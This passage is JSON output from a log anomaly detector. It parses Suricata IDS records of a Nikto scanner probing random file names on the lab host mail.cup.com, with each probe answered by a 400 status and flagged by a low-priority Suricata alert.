"\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46942, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1217064866564597, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80", "/parser/model/time": 1583349514.349169, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46944, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.el", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.349508, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":883960087990575,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46944, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":883960087990575,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 883960087990575, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80", "/parser/model/time": 1583349514.351261, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46946, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.351522, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":455618704595240,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46946, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":455618704595240,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 455618704595240, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80", "/parser/model/time": 1583349514.353104, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46948, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.access", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.353275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", 